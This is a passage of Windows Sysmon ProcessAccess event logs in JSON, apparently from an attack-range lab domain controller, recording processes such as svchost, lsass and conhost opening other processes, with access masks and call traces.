C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.206\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.206","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.315\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.315","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.315\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.315","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":975,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B3410100}\r\nSourceProcessId: 2156\r\nSourceThreadId: 2448\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B3410100}","SourceProcessId":"2156","SourceThreadId":"2448","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010E2370100}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":976,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B4410100}\r\nSourceProcessId: 2164\r\nSourceThreadId: 2444\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B4410100}","SourceProcessId":"2164","SourceThreadId":"2444","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":977,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.346\r\nSourceProcessGUID: {41C8662E-1F64-5F25-0000-00103B7E0100}\r\nSourceProcessId: 2356\r\nSourceThreadId: 2456\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001053410100}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:08.346","SourceProcessGUID":"{41C8662E-1F64-5F25-0000-00103B7E0100}","SourceProcessId":"2356","SourceThreadId":"2456","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001053410100}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:08.346\r\nSourceProcessGUID: {41C8662E-1F64-5F25-0000-0010926E0100}\r\nSourceProcessId: 2264\r\nSourceThreadId: 2452\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 